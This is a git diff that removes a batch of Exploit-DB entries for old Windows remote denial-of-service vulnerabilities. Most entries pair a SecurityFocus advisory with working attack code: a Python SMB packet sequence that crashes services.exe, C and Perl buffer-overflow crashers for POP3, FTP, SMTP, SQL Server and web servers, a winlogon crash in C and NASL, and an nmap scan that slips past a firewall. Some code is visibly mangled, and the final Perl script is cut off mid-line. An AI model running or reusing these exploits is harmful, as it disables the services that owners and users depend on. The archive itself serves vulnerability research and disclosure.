diff --git a/platforms/windows/remote/19238.txt b/platforms/windows/remote/19238.txt
deleted file mode 100755
index 43a86872f..000000000
--- a/platforms/windows/remote/19238.txt
+++ /dev/null
@@ -1,9 +0,0 @@
-source: http://www.securityfocus.com/bid/298/info
-
-NT Workstations and Servers must have unique hostnames if they reside on the same network. Should an NT host attempt to use an existing hostname, the second server (with the new duplicate name) will fail to start its workstation and server services. (Once the name has been changed to a unique value and has been rebooted, the host will operate normally).
-
-Should an NT host claim the hostname of a "victim" NT host while that host is turned off, the "victim" host will be subject to a Denial of Service-like attack because the workstation and server services will fail to start. NT hosts are usually prevented from taking duplicate names within one domain they must register their existence with an NT Domain Controller when initially joining the domain. (This registration process must be performed by someone with administrator privileges.)
-
-A situation has been noted wherein a Win95 host may register the victim hostname (with a WINS server) by setting the Win95 workgroup name equal to the victim's hostname. The next time the victim host is rebooted, it will fail to start the workstation and server services as the WINS server will report that the hostname is claimed by the Win95 host.
-
-Set the Win95 workgroup name equal to the hostname for the victim NT host. If the WINS server registers this hostname, and the victim NT host is rebooted, it will fail to start its workstation and server services.
\ No newline at end of file
diff --git a/platforms/windows/remote/19577.py b/platforms/windows/remote/19577.py
deleted file mode 100755
index 6a50078c5..000000000
--- a/platforms/windows/remote/19577.py
+++ /dev/null
@@ -1,161 +0,0 @@ -source: http://www.securityfocus.com/bid/754/info - -A specially crafted packet can cause a denial of service on an NT 4.0 host, rendering local administration and network communication nearly unusable. This attack will crash the "services" executable, which in turn, disables the ability for the machine to perform actions via named pipes. As a consequence, users will be unable to remotely logon, logoff, manage the registry, create new file share connections, or perform remote administration. Services such as Internet Information Server may also fail to operate as expected. Rebooting the affected machine will resolve the issue, provided it is not attacked again. - -The problem lies within the manner that srvsvc.dll makes calls to services.exe. Certain MSRPC calls will return NULL values which are not correctly interpreted by services.exe. This, in turn, may lead to a crash of Services.exe. - -If this denial of service is combined with a number of other exploits, it may be possible to have this attack spawn a Debugger (ie Dr Watson) call on the host, which, if trojaned, may execute malicious code on the target host. - -#!/usr/bin/env python -# -# Services.exe DoS -# hard work done by: rfp@wiretrip.net -# Python hack by: nas@adler.dynodns.net -# -# This only seems to work on NT. Also, it may have to be run multiple times -# before SERVICES.EXE will die. Improvements welcome. 
-# -# Usage: rfpoison.py - -import string -import struct -from socket import * -import sys - -def a2b(s): - bytes = map(lambda x: string.atoi(x, 16), string.split(s)) - data = string.join(map(chr, bytes), '') - return data - -def b2a(s): - bytes = map(lambda x: '%.2x' % x, map(ord, s)) - return string.join(bytes, ' ') - -# NBSS session request -nbss_session = a2b(""" - 81 00 00 48 20 43 4b 46 44 45 - 4e 45 43 46 44 45 46 46 43 46 47 45 46 46 43 43 - 41 43 41 43 41 43 41 43 41 43 41 00 20 45 48 45 - 42 46 45 45 46 45 4c 45 46 45 46 46 41 45 46 46 - 43 43 41 43 41 43 41 43 41 43 41 41 41 00 00 00 - 00 00 - """) - -# SMB stuff -crud = ( - # SMBnegprot Request - """ - ff 53 4d 42 72 00 - 00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00 - 00 00 00 00 f4 01 00 00 01 00 00 81 00 02 50 43 - 20 4e 45 54 57 4f 52 4b 20 50 52 4f 47 52 41 4d - 20 31 2e 30 00 02 4d 49 43 52 4f 53 4f 46 54 20 - 4e 45 54 57 4f 52 4b 53 20 31 2e 30 33 00 02 4d - 49 43 52 4f 53 4f 46 54 20 4e 45 54 57 4f 52 4b - 53 20 33 2e 30 00 02 4c 41 4e 4d 41 4e 31 2e 30 - 00 02 4c 4d 31 2e 32 58 30 30 32 00 02 53 61 6d - 62 61 00 02 4e 54 20 4c 41 4e 4d 41 4e 20 31 2e - 30 00 02 4e 54 20 4c 4d 20 30 2e 31 32 00 - """, - - # SMBsessetupX Request - """ - ff 53 4d 42 73 00 - 00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00 - 00 00 00 00 f4 01 00 00 01 00 0d ff 00 00 00 ff - ff 02 00 f4 01 00 00 00 00 01 00 00 00 00 00 00 - 00 00 00 00 00 17 00 00 00 57 4f 52 4b 47 52 4f - 55 50 00 55 6e 69 78 00 53 61 6d 62 61 00 - """, - - # SMBtconX Request - """ - ff 53 4d 42 75 00 - 00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00 - 00 00 00 00 f4 01 00 08 01 00 04 ff 00 00 00 00 - 00 01 00 17 00 00 5c 5c 2a 53 4d 42 53 45 52 56 - 45 52 5c 49 50 43 24 00 49 50 43 00 - """, - - # SMBntcreateX request - """ - ff 53 4d 42 a2 00 - 00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00 - 00 00 00 08 f4 01 00 08 01 00 18 ff 00 00 00 00 - 07 00 06 00 00 00 00 00 00 00 9f 01 02 00 00 00 - 00 00 00 00 00 00 00 00 00 00 03 00 00 00 01 00 - 00 
00 00 00 00 00 02 00 00 00 00 08 00 5c 73 72 - 76 73 76 63 00 - """, - - # SMBtrans Request - """ - ff 53 4d 42 25 00 - 00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00 - 00 00 00 08 f4 01 00 08 01 00 10 00 00 48 00 00 - 00 48 00 00 00 00 00 00 00 00 00 00 00 00 00 4c - 00 48 00 4c 00 02 00 26 00 00 08 51 00 5c 50 49 - 50 45 5c 00 00 00 05 00 0b 00 10 00 00 00 48 00 - 00 00 01 00 00 00 30 16 30 16 00 00 00 00 01 00 - 00 00 00 00 01 00 c8 4f 32 4b 70 16 d3 01 12 78 - 5a 47 bf 6e e1 88 03 00 00 00 04 5d 88 8a eb 1c - c9 11 9f e8 08 00 2b 10 48 60 02 00 00 00 - """, - - # SMBtrans Request - """ - ff 53 4d 42 25 00 - 00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00 - 00 00 00 08 f4 01 00 08 01 00 10 00 00 58 00 00 - 00 58 00 00 00 00 00 00 00 00 00 00 00 00 00 4c - 00 58 00 4c 00 02 00 26 00 00 08 61 00 5c 50 49 - 50 45 5c 00 00 00 05 00 00 03 10 00 00 00 58 00 - 00 00 02 00 00 00 48 00 00 00 00 00 0f 00 01 00 - 00 00 0d 00 00 00 00 00 00 00 0d 00 00 00 5c 00 - 5c 00 2a 00 53 00 4d 00 42 00 53 00 45 00 52 00 - 56 00 45 00 52 00 00 00 00 00 01 00 00 00 01 00 - 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 - """ -) -crud = map(a2b, crud) - - -def smb_send(sock, data, type=0, flags=0): - d = struct.pack('!BBH', type, flags, len(data)) - #print 'send:', b2a(d+data) - sock.send(d+data) - -def smb_recv(sock): - s = sock.recv(4) - assert(len(s) == 4) - type, flags, length = struct.unpack('!BBH', s) - data = sock.recv(length) - assert(len(data) == length) - #print 'recv:', b2a(s+data) - return type, flags, data - -def nbss_send(sock, data): - sock.send(data) - -def nbss_recv(sock): - s = sock.recv(4) - assert(len(s) == 4) - return s - -def main(host, port=139): - s = socket(AF_INET, SOCK_STREAM) - s.connect(host, port) - nbss_send(s, nbss_session) - nbss_recv(s) - for msg in crud[:-1]: - smb_send(s, msg) - smb_recv(s) - smb_send(s, crud[-1]) # no response to this - s.close() - -if __name__ == '__main__': - print 'Sending poison...', - main(sys.argv[1]) - print 'done.' 
- ---82I3+IH0IqGh5yIs-- diff --git a/platforms/windows/remote/19578.txt b/platforms/windows/remote/19578.txt deleted file mode 100755 index a2d3216f2..000000000 --- a/platforms/windows/remote/19578.txt +++ /dev/null @@ -1,9 +0,0 @@ -source: http://www.securityfocus.com/bid/754/info - -A specially crafted packet can cause a denial of service on an NT 4.0 host, rendering local administration and network communication nearly unusable. This attack will crash the "services" executable, which in turn, disables the ability for the machine to perform actions via named pipes. As a consequence, users will be unable to remotely logon, logoff, manage the registry, create new file share connections, or perform remote administration. Services such as Internet Information Server may also fail to operate as expected. Rebooting the affected machine will resolve the issue, provided it is not attacked again. - -The problem lies within the manner that srvsvc.dll makes calls to services.exe. Certain MSRPC calls will return NULL values which are not correctly interpreted by services.exe. This, in turn, may lead to a crash of Services.exe. - -If this denial of service is combined with a number of other exploits, it may be possible to have this attack spawn a Debugger (ie Dr Watson) call on the host, which, if trojaned, may execute malicious code on the target host. - -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19578.zip \ No newline at end of file diff --git a/platforms/windows/remote/19596.txt b/platforms/windows/remote/19596.txt deleted file mode 100755 index 2f372a8de..000000000 --- a/platforms/windows/remote/19596.txt +++ /dev/null @@ -1,7 +0,0 @@ -source: http://www.securityfocus.com/bid/771/info - -BFTelnet, a telnet server for Windows NT by Byte Fusion, will crash if a user name of 3090 or more characters is supplied. - - -telnet victim.com -Login: [3090 charcter string] \ No newline at end of file 
diff --git a/platforms/windows/remote/19616.c b/platforms/windows/remote/19616.c deleted file mode 100755 index d4adf5199..000000000 --- a/platforms/windows/remote/19616.c +++ /dev/null 
@@ -1,164 +0,0 @@ -source: http://www.securityfocus.com/bid/789/info - -There is a buffer overflow in the username field when the username is between 200 and 500 characters. Although it may be possible to execute arbitrary code on the vulnerable server, current exploits only cause a denial of service on the remote machine. - -Exploit (by Interrupt): - - -/* - * IMAIL 5.07 POP3 Overflow - * By: Mike@eEye.com - * - * Demonstrates vulnerability - */ - - - #include - #include - - -#ifdef WINDOWS - #include - #include -#else - #include - #include - #include - #include -#endif - - -#ifndef WINDOWS - #define SOCKET_ERROR -1 - #define closesocket(sock) close(sock) - #define WSACleanup() ; -#endif - - -char overflow[] = - "USER AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" - "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" - "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" - "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" - "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" - "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n"; - - -int main(int argc, char *argv[]) -{ -#ifdef WINDOWS - WSADATA wsaData; -#endif - - - struct hostent *hp; - struct sockaddr_in sockin; - char buf[300], *check; - int sockfd, bytes; - char *hostname; - unsigned short port; - - - if (argc <= 1) - { - printf("IMAIL POP3 Overflow\n"); - printf("By: Mike@eEye.com\n\n"); - - - printf("Usage: %s [hostname] [port]\n", argv[0]); - printf("If port is not specified we use '110'\n"); - - - exit(0); - } - - - hostname = argv[1]; - if (argv[2]) port = atoi(argv[2]); - else port = atoi("110"); - - - printf("IMAIL POP3 Overflow\n"); - printf("By: Mike@eEye.com\n\n"); - - -#ifdef WINDOWS - if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0) - { - fprintf(stderr, "Error setting up with WinSock v1.1\n"); - exit(-1); - } -#endif - - - hp = gethostbyname(hostname); - if (hp == NULL) - { - printf("ERROR: Uknown host %s\n", hostname); - exit(-1); - } - - - sockin.sin_family = hp->h_addrtype; - 
sockin.sin_port = htons(port); - sockin.sin_addr = *((struct in_addr *)hp->h_addr); - - - if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR) - { - printf("ERROR: Socket Error\n"); - exit(-1); - } - - - if ((connect(sockfd, (struct sockaddr *) &sockin, - sizeof(sockin))) == SOCKET_ERROR) - { - printf("ERROR: Connect Error\n"); - closesocket(sockfd); - WSACleanup(); - exit(-1); - } - - - printf("Connected to [%s] on port [%d], sending overflow....\n", - hostname, port); - - - /* Check to see if we get a +OK error code. If so then proceed. */ - if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR) - { - printf("ERROR: Recv Error\n"); - closesocket(sockfd); - WSACleanup(); - exit(1); - } - - - buf[bytes] = '\0'; - check = strstr(buf, "+OK"); - if (check == NULL) - { - printf("ERROR: NO +OK response from inital connect\n"); - closesocket(sockfd); - WSACleanup(); - exit(-1); - } - - - if (send(sockfd, overflow, strlen(overflow),0) == SOCKET_ERROR) - { - printf("ERROR: Send Error\n"); - closesocket(sockfd); - WSACleanup(); - exit(-1); - } - - - printf("Sent.\n"); - - - closesocket(sockfd); - WSACleanup(); -} - diff --git a/platforms/windows/remote/19636.txt b/platforms/windows/remote/19636.txt deleted file mode 100755 index 9bc9fe5ef..000000000 --- a/platforms/windows/remote/19636.txt +++ /dev/null @@ -1,13 +0,0 @@ -source: http://www.securityfocus.com/bid/813/info - -The ZetaMail mail server will crash if a username/password pair longer than 3500 characters is supplied by the client. - -19636-1.exe - binary for windows -19636-2.zip - source for windows -19636-3.tgz - source for linux - -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19636-1.exe - -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19636-2.zip - -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19636-3.tgz \ No newline at end of file 
diff --git a/platforms/windows/remote/19638.c b/platforms/windows/remote/19638.c deleted file mode 100755 index 5a231379b..000000000 --- a/platforms/windows/remote/19638.c +++ /dev/null @@ -1,64 +0,0 @@ -source: http://www.securityfocus.com/bid/817/info - -If Microsoft SQL Server 7.0 receives a TDS header with three or more NULL bytes as data it will crash. The crash will generate an event in the log with ID 17055 "fatal exception EXCEPTION_ACCESS VIOLATION". - -/* -** sqldos.c -- a DoS attack agains MS SQL Server -*/ - -#include -#include -#include -#include -#include -#include -#include -#include - -#define PORT 1433 /* the port SQL Server listens on */ - - -int main(int argc, char *argv[]) -{ - int sockfd, numbytes; - struct hostent *he; - char buff[65535]; - struct sockaddr_in target_addr; - - if (argc != 2) { - fprintf(stderr,"Usage: sqldos target\n"); - exit(1); - } - - if ((he=gethostbyname(argv[1])) == NULL) - - perror("gethostbyname"); - exit(1); - } - - if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { - perror("socket error"); - exit(1); - } - - target_addr.sin_family = AF_INET; - target_addr.sin_port = htons(PORT); - target_addr.sin_addr = *((struct in_addr *)he->h_addr); - bzero(&(target_addr.sin_zero), 8); - - if (connect(sockfd, (struct sockaddr *)&target_addr, sizeof(struct -sockaddr)) == -1) { - perror("connect error"); - exit(1); - } - memset(&buff, 0, 3); - - if ((numbytes=send(sockfd, buff, 14, 0)) == -1) { - perror("send errot"); - exit(1); - } - close(sockfd); - - return 0; -} - diff --git a/platforms/windows/remote/19640.txt b/platforms/windows/remote/19640.txt deleted file mode 100755 index cd620d5c4..000000000 --- a/platforms/windows/remote/19640.txt +++ /dev/null 
@@ -1,5 +0,0 @@ -source: http://www.securityfocus.com/bid/823/info - -Alt-N's WorldClient is an email webserver that allows it's users to retrieve email via HTTP. It is susceptible to denial of service attacks due to an unchecked buffer in the request handler. Supplying a long url will crash the server. - -http ://target.host:2000/[long string] \ No newline at end of file diff --git a/platforms/windows/remote/19664.txt b/platforms/windows/remote/19664.txt deleted file mode 100755 index c239febe2..000000000 --- a/platforms/windows/remote/19664.txt +++ /dev/null @@ -1,5 +0,0 @@ -source: http://www.securityfocus.com/bid/859/info - -If the Serv-U FTP server receives an overly long argument to the SITE PASS command, it will crash. To issue this command, an attacker must be already logged in as an authenticated user, including an 'anonymous' user. - -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19664.zip \ No newline at end of file diff --git a/platforms/windows/remote/19695.txt b/platforms/windows/remote/19695.txt deleted file mode 100755 index 791a98814..000000000 --- a/platforms/windows/remote/19695.txt +++ /dev/null @@ -1,5 +0,0 @@ -source: http://www.securityfocus.com/bid/897/info - -The Savant Webserver cannot properly handle null characters in a GET request. If it encounters one, it will crash. The failure is logged in \Logs\general.txt - -http ://target/%00/ \ No newline at end of file diff --git a/platforms/windows/remote/19748.txt b/platforms/windows/remote/19748.txt deleted file mode 100755 index 0fb92f88f..000000000 --- a/platforms/windows/remote/19748.txt +++ /dev/null 
@@ -1,12 +0,0 @@ -source: http://www.securityfocus.com/bid/982/info - - -Submitting a RETR command with a message ID argument longer than 10 numeric characters will result in a crash of the Internet Anywhere Mail Server. A Doctor Watson error message will appear reporting an access violation by MailServer.exe. Restarting the mail server will resume functionality. This denial of service attack does not affect other running programs, and requires the attacker to have a valid username and password on the POP3 server. - -telnet target 110 -+OK POP3 Welcome to someco.com using the Internet Anywhere Mail Server Version:3.1.3. Build: 1065 by True North Software, Inc. <184.4675258510890593303@someco.com> -user username -+OK valid -pass password -+OK Authorized -RETR 11111111111 \ No newline at end of file diff --git a/platforms/windows/remote/19820.txt b/platforms/windows/remote/19820.txt deleted file mode 100755 index ca8374767..000000000 --- a/platforms/windows/remote/19820.txt +++ /dev/null @@ -1,5 +0,0 @@ -source: http://www.securityfocus.com/bid/1076/info - -Requesting a URL containing a string of exactly eight characters following the /cgi-bin/ directory (17 characters in total) will cause AnalogX SimpleServer:WWW to shut down. - -http://target/cgi-bin/<8 character long string> \ No newline at end of file diff --git a/platforms/windows/remote/19871.txt b/platforms/windows/remote/19871.txt deleted file mode 100755 index c7cc7235e..000000000 --- a/platforms/windows/remote/19871.txt +++ /dev/null @@ -1,5 +0,0 @@ -source: http://www.securityfocus.com/bid/1137/info - -Certain versions of Zone Labs personal Firewall have a vulnerability which allows malicious users to port scan the firewall without being detected. In particular if the port scan originates from source port 67 on the attacking host the ZoneAlarm fails to register the attack. - -nmap -g67 -P0 -p130-140 -sU \ No newline at end of file 
diff --git a/platforms/windows/remote/20005.c b/platforms/windows/remote/20005.c deleted file mode 100755 index 04899c7c7..000000000 --- a/platforms/windows/remote/20005.c +++ /dev/null 
@@ -1,524 +0,0 @@ -source: http://www.securityfocus.com/bid/1331/info - -In special circumstances while handling requests to access the Remote Registry Server, Windows NT 4.0 can crash due to winlogon.exe's inability to process specially malformed remote registry requests. Rebooting the machine would be required in order to regain normal functionality. - -Only authenticated users on the network would be able to exploit this vulnerability. If Windows NT was configured to deny all remote registry requests, it would not be affected by this vulnerability under any conditions. - -/* - * crash_winlogon.c - * - * by Renaud Deraison - deraison@cvs.nessus.org - * - * This code is released under the GNU General Public License. - * (thanks for respecting this license) - * - * In case you are wondering, here is the motto I applied for this code : - * - * "Structures are for sissies" - */ -#include -#include -#ifdef WIN32 -#include -#define bzero(x,y) memset(x, 0, y) -#else -#include -#include -#include -#include -#define closesocket(x) close(x) -#endif - - -char * netbios_name(char * orig) -{ - int i, len; - char * ret = malloc(40); - - bzero(ret, 40); - len = strlen(orig); - for(i=0;i<16;i++) - { - if(i >= len) - strcat(ret, "CA"); - else - { - int odiv, omod; - - odiv = (orig[i] / 16) + 'A'; - omod = (orig[i] % 16) + 'A'; - ret[strlen(ret)]=odiv; - ret[strlen(ret)]=omod; - } - } - return(ret); -} - -char * netbios_redirector() -{ - int i; - char * ret = malloc(31); - bzero(ret, 31); - for(i=0;i<15;i++)strcat(ret, "CA"); - strcat(ret, "AA"); - return(ret); -} - - -char* unicode(char * data) -{ - int len = strlen(data); - int i; - char * ret = malloc(110); - int l = 0; - - bzero(ret,110); - for(i=0;i -# -# See the Nessus Scripts License for details -# - -if(description) -{ - script_id(10414); - script_cve_id("CAN-2000-0377"); - name["english"] = "WinLogon.exe DoS"; - name["francais"] = "Dini de service WinLogon.exe"; - - script_name(english:name["english"], - 
francais:name["francais"]); - - desc["english"] = " - -It seems that is was possible to crash remotely -winlogon.exe by sending a malformed request to -access the registry of the remote host. - -As soon as you validate the error box, the host -will reboot. - - -Solution : apply hotfix Q264684 - -Risk factor : High - -See also : http://www.microsoft.com/technet/security/bulletin/ms00-040.asp"; - - - desc["francais"] = " - -Il semble qu'il ait iti possible de faire -planter le programme WinLogon.exe en lui -envoyant une requhte mal formie pour accider -` sa base de registres. - -Dhs que vous validerez la boite de dialogue, -l'hote distant redimarrera. - -Solution : appliquez le hotfix Q264684 - -Facteur de risque : Elevi - -Voir aussi : http://www.microsoft.com/technet/security/bulletin/ms00-040.asp"; - - - script_description(english:desc["english"], - francais:desc["francais"]); - - summary["english"] = "crashes winlogon.exe"; - summary["francais"] = "fait planter winlogon.exe"; - script_summary(english:summary["english"], - francais:summary["francais"]); - - script_category(ACT_DENIAL); - - script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison"); - family["english"] = "Denial of Service"; - family["francais"] = "Dini de service"; - script_family(english:family["english"], francais:family["francais"]); - - script_dependencies("netbios_name_get.nasl", - "smb_login.nasl"); - script_require_keys("SMB/name", "SMB/login", "SMB/password"); - script_require_ports(139); - exit(0); -} - - -#-----------------------------------------------------------------# -# Convert a netbios name to the netbios network format # -#-----------------------------------------------------------------# -function netbios_name(orig) -{ - ret = ""; - len = strlen(orig); - for(i=0;i<16;i=i+1) - { - if(i >= len) - { - c = "CA"; - } - else - { - o = ord(orig[i]); - odiv = o/16; - odiv = odiv + ord("A"); - omod = o%16; - omod = omod + ord("A"); - c = raw_string(odiv, omod); - } - 
ret = ret+c; - } - return(ret); -} - -#--------------------------------------------------------------# -# Returns the netbios name of a redirector # -#--------------------------------------------------------------# - -function netbios_redirector_name() -{ - ret = crap(data:"CA", length:30); - ret = ret+"AA"; - return(ret); -} - -#-------------------------------------------------------------# -# return a 28 + strlen(data) + (odd(data)?0:1) long string # -#-------------------------------------------------------------# -function unicode(data) -{ - len = strlen(data); - ret = raw_string(ord(data[0])); - - for(i=1;i -#include -#include -#include -#include -#include -#include -#include -#include -#include - - -struct analogXDoS_types { - char *service; - int port; - char *command; - int overflow_string_size; -}; - -struct analogXDoS_types analogXDoS_types[]={ - {"AnalogX FTP Proxy ",21,"USER BO@userfriendly.org\n",370}, - {"AnalogX SMTP Proxy",25,"HELO BO@userfriendly.org\n",370}, - {"AnalogX POP3 Proxy",110,"USER BO@userfriendly.org\n",370}, - {NULL,0,NULL,0} -}; - - - -int -openhost(char *host,int port) { - int sock; - struct sockaddr_in addr; - struct hostent *he; - he=gethostbyname(host); - if (he==NULL) return -1; - sock=socket(AF_INET, SOCK_STREAM, getprotobyname("tcp")->p_proto); - if (sock==-1) return -1; - memcpy(&addr.sin_addr, he->h_addr, he->h_length); - addr.sin_family=AF_INET; - addr.sin_port=htons(port); - if(connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1) sock=-1; - return sock; -} - -void -sends(int sock,char *buf) { - write(sock,buf,strlen(buf)); -} - -void -analogXcrash(char *host, int type) -{ - char *buf; - int sock, i, x, buffer_size; - printf("Type Number: %d\n",type); - printf("Service : %s\n",analogXDoS_types[type].service); - printf("Port : %d\n",analogXDoS_types[type].port); - printf("Let the show begin ladyes...\n"); - printf("Connecting to %s [%d]...",host,analogXDoS_types[type].port); - 
sock=openhost(host,analogXDoS_types[type].port); - if (sock==-1) - { - printf("FAILED!\n"); - printf("Couldnt connect...leaving :|\n\n"); - exit(-1); - } - printf("SUCCESS!\n"); - printf("Allocating memory for buffer..."); - buffer_size=(strlen(analogXDoS_types[type].command) - + - analogXDoS_types[type].overflow_string_size); - if (!(buf=malloc(buffer_size))) - { - printf("FAILED!\n"); - printf("Leaving... :[\n\n"); - exit(-1); - } - printf("WORKED! (heh)\n"); - for(i=0;;i++) - if ((analogXDoS_types[type].command[i]=='B') && - (analogXDoS_types[type].command[i+1]=='O')) break; - else buf[i]=analogXDoS_types[type].command[i]; - for(x=0;x [port]\n",argv[0]); - show_types(); - printf("\n*Enjoy*...\n\n"); - } - else if (atoi(argv[2])<=i) - if (argc==3) analogXcrash(argv[1],atoi(argv[2])); - else { - analogXDoS_types[atoi(argv[2])].port=atoi(argv[3]); - analogXcrash(argv[1],atoi(argv[2])); - } - else - { - printf("Invalid type value (max type=%d)\n",i); - printf("Type %s for more information :)\n\n",argv[0]); - } -} diff --git a/platforms/windows/remote/20225.pl b/platforms/windows/remote/20225.pl deleted file mode 100755 index f5aea7dce..000000000 --- a/platforms/windows/remote/20225.pl +++ /dev/null 
@@ -1,245 +0,0 @@ -source: http://www.securityfocus.com/bid/1689/info - -Alt-N MDaemon 3.1.1 is subject to a denial of service. If a remote user requests a specially crafted URL to the web services within MDaemon the service will crash. A restart of the service is required in order to gain normal functionality. - -#!/usr/bin/perl -##################################################################### -# Based upon advisories by USSR (www.ussrback.com) # -# # -# Demonstration script to remotely overflow various server buffers, # -# resulting in a denial of service, for TESTING purposes only. # -# Runs on *nix & WinXX with perl & Net::Telnet available from CPAN # -# # -# G6 FTP Server v2.0 beta4/5 # -# MDaemon httpd Server v2.8.5.0 # -# Avirt Mail Server v3.5 # -# BisonWare FTP Server v3.5 # -# Vermillion FTP Server v1.23 # -# ZetaMail POP3 Server v2.1 # -# WFTPD FTP Server 2.40 # -# BFTelnet Server v1.1 # -# Broker FTP Server v3.5 # -# ExpressFS FTP server v2.x # -# XtraMail POP3 Server v1.11 # -# Cmail SMTP Server v2.4 # -# PakMail SMTP/POP3 v1.25 # -# # -# December '99 # -##################################################################### - -use IO::Socket; -use Getopt::Std; -#use Net::Telnet; -getopts('h:p:t:u:v', \%args); -if(!defined($args{h}) && !defined($args{t})) { -print qq~Usage: $0 -h -t ((-u username) | (-p password)) | -v - - -h victim to test remote overflow DoS on - -t server type (check the -v option for list) - -u username authorisation (required if server prompts for username) - -p password authentication (required if user/passwd is expected) - -v lists all servers vulnerable to each DoS - -~; exit; } - -if(defined($args{u})) { $user=$args{u}; } -if(defined($args{p})) { $pass=$args{p}; } -if(defined($args{v})) { &vulnerable; } -if(defined($args{h}) && defined($args{t})){ -if(($args{t}) == 1) { &G6; } -if(($args{t}) == 2) { &mdaemon; } -if(($args{t}) == 3) { &avirt; } -if(($args{t}) == 4) { &bisonware; } -if(($args{t}) == 5) { &vermillion; } 
-if(($args{t}) == 6) { &zetamail; } -if(($args{t}) == 7) { &wftpd; } -if(($args{t}) == 8) { &bftelnet; } -if(($args{t}) == 9) { &broker; } -if(($args{t}) == 10) { &expressfs; } -if(($args{t}) == 11) { &xtramail; } -if(($args{t}) == 12) { &cmail; } -if(($args{t}) == 13) { &pakmail; } -if(($args{t}) == 14) { &pakpop; }} - -sub G6 { -$denial .= "A" x 2000; -$victim=$args{h}; - $socket = IO::Socket::INET->new (Proto => "tcp", - PeerAddr => $victim, - PeerPort => "21") or die "Can't connect.\n"; - $socket->autoflush(1); -print $socket "$denial\n"; # user -print "\nSent overflow to $victim\n"; -close $socket; } - -sub mdaemon { -$victim=$args{h}; -$denial .= "A" x 1025; -$url = "/$denial"; - $socket = IO::Socket::INET->new (Proto => "tcp", - PeerAddr => $victim, - PeerPort => "80") or die "Can't connect.\n"; -print $socket "GET $url\n"; -print "\nSent overflow to $victim\n"; -close $socket; } - -sub avirt { -$victim=$args{h}; -$denial .= "A" x 856; - $socket = IO::Socket::INET->new (Proto => "tcp", - PeerAddr => $victim, - PeerPort => "25") or die "Can't connect\n"; - $socket->autoflush(1); -print $socket "user $user\n"; -print $socket "pass $denial\n"; -print "\nSent overflow to $victim\n"; -close $socket; } - -sub bisonware { -$victim=$args{h}; -$denial .= "A" x 2000; - $socket = IO::Socket::INET->new (Proto => "tcp", - PeerAddr => $victim, - PeerPort => "21") or die "Can't connect\n"; - $socket->autoflush(1); -print $socket "$denial\n"; -print "\nSent overflow to $victim\n"; -close $socket; } - -sub vermillion { -$victim=$args{h}; -$denial .= "A" x 504; - $socket = IO::Socket::INET->new (Proto => "tcp", - PeerAddr => $victim, - PeerPort => "21") or die "Can't connect\n"; - $socket->autoflush(1); -print $socket "$user\n"; -print $socket "$pass\n"; -print $socket "cwd $denial\n"; -for($i=0; $i<=3; $i++) { print $socket "CWD $denial\n"; } -print "\nSent overflow to $victim\n"; -close $socket; } - -sub zetamail { -$victim=$args{h}; -$denial .= "A" x 3500; - $socket = 
IO::Socket::INET->new (Proto => "tcp", - PeerAddr => $victim, - PeerPort => "110") or die "Can't connect.\n"; -print $socket "user $denial\n"; -print $socket "pass $denial\n"; -print "\nSent overflow to $victim\n"; -close $socket; } - -sub wftpd { -$victim=$args{h}; -$denial .= "A" x 255; - $socket = IO::Socket::INET->new (Proto => "tcp", - PeerAddr => $victim, - PeerPort => "21") or die "Can't connect.\n"; -print $socket "$user\n"; -print $socket "$pass\n"; -print $socket "MKDIR $denial\n"; -print $socket "CWD $denial\n"; -print "\nSent overflow to $victim\n"; -close $socket; } - -sub bftelnet { -# use Net::Telnet; -$victim=$args{h}; -$denial .= "A" x 3090; -$telnet = new Net::Telnet ( Timeout =>10, - Errmode =>'die'); -$telnet->open('$victim'); -$telnet->waitfor('/Login: $/i'); -$telnet->print('$denial'); -print "\nSent overflow to $victim\n"; -close $telnet; } - -sub broker { -$victim=$args{h}; -$denial .= "A" x 2730; - $socket = IO::Socket::INET->new (Proto => "tcp", - PeerAddr => $victim, - PeerPort => "21") or die "Can't connect.\n"; -print $socket "$denial\n"; -print "\nSent overflow to $victim\n"; -close $socket; } - - -sub expressfs { -$victim=$args{h}; -$denial .= "A" x 654; - $socket = IO::Socket::INET->new (Proto => "tcp", - PeerAddr => $victim, - PeerPort => "21") or die "Can't connect.\n"; -print $socket "$denial\n"; -print $socket "AAAAAAAAAAAAAAAAAAA\n"; -print "\nSent overflow to $victim\n"; -close $socket; } - -sub xtramail { -$victim=$args{h}; -$denial .= "A" x 2930; - $socket = IO::Socket::INET->new (Proto => "tcp", - PeerAddr => $victim, - PeerPort => "25") or die "Can't connect.\n"; -print $socket "MAIL FROM: test\@localhost\n"; -print $socket "RCPT TO: $denial\@localhost\n"; -print "\nSent overflow to $victim\n"; -close $socket; } - -sub cmail { -$victim=$args{h}; -$denial .= "A" x 7090; - $socket = IO::Socket::INET->new (Proto => "tcp", - PeerAddr => $victim, - PeerPort => "25") or die "Can't connect.\n"; -print $socket "MAIL FROM: 
